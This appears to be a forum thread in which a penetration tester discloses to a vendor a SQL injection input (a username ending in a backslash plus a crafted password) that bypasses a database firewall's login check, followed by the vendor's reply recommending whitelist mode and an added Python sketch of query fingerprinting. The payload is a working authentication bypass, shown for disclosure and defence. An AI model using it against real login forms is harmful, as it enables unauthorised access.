SQL Bypass

Hey Yuli,
I found another exploit/bypass in the system.

When you enter in the username: rotem\\
with password: or name != ('b

the query looks like this
SELECT * FROM user WHERE name = 'rotem\' AND pwd=SHA(' or name != ('b')

as what the parser sees is
SELECT * FROM user WHERE name = 'rotem\' AND pwd=SHA(' or name != ('b')
select * from user where name = ? or name != (?)

This bypasses the system.
Fun working with you :) Your system gets more and more challenging every day.

Rotem Bar

Penetration Tester, rotem@indomite.com

Comments

Hi Rotem

Thank you for your post. I checked the query and can say that it is almost impossible for us to detect SQL injection using our SQL risk matrix in this case. It looks like a 100% legit query.

We still have a solution for such queries. In our new application version we support a new mode of operation in which all new queries that do not appear in the db profile (whitelist in our case) are blocked. This is a recommended method and we advise you to use it. It will give you a much higher level of protection in addition to the risk matrix calculation.

Thanks,
Yuli
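
The whitelist mode described in the reply above, sketched as an added example that is not part of the original thread or the product's code: queries are reduced to a literal-free shape and anything whose shape is not in the learned profile is blocked. The names `fingerprint`, `build_login_query`, `PROFILE` and `allowed` are hypothetical, and the string-concatenated login query is an assumption about how the application builds it.

```python
import re

def fingerprint(sql: str) -> str:
    """Replace string literals with '?' and normalise case/whitespace.
    Assumes MySQL default quoting: backslash escapes the next character,
    and a doubled quote inside a literal is an escaped quote."""
    out, i, n = [], 0, len(sql)
    while i < n:
        ch = sql[i]
        if ch in ("'", '"'):
            quote, i = ch, i + 1
            while i < n:
                if sql[i] == "\\":            # \' does NOT end the literal
                    i += 2
                elif sql[i] == quote:
                    if i + 1 < n and sql[i + 1] == quote:
                        i += 2                # '' is an escaped quote
                    else:
                        i += 1                # real closing quote
                        break
                else:
                    i += 1
            out.append("?")
        else:
            out.append(ch)
            i += 1
    return re.sub(r"\s+", " ", "".join(out)).strip().lower()

def build_login_query(name: str, pwd: str) -> str:
    # Assumed application behaviour: unescaped string concatenation.
    return ("SELECT * FROM user WHERE name = '" + name +
            "' AND pwd=SHA('" + pwd + "')")

# Profile learned from ordinary traffic (constructed sample credentials).
PROFILE = {fingerprint(build_login_query("alice", "s3cret"))}

def allowed(sql: str) -> bool:
    """Whitelist decision: only query shapes already in the profile pass."""
    return fingerprint(sql) in PROFILE

# The input from the post: username ends in a backslash, so the quote that
# should close the name literal is escaped and the literal swallows
# "AND pwd=SHA(" up to the quote that opens the password value.
PAGE_QUERY = build_login_query("rotem\\", " or name != ('b")

if __name__ == "__main__":
    for q in (build_login_query("bob", "hunter2"), PAGE_QUERY):
        print("ALLOW" if allowed(q) else "BLOCK", "|", fingerprint(q))
```

The shape of the second query matches the normalised form quoted in the post, which is why a per-query risk score sees nothing unusual while a profile comparison does.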

Hi Yuli,
Please, I would also like to have the SQL bypass, so I can know more about it. I am a database administrator.
Thanks
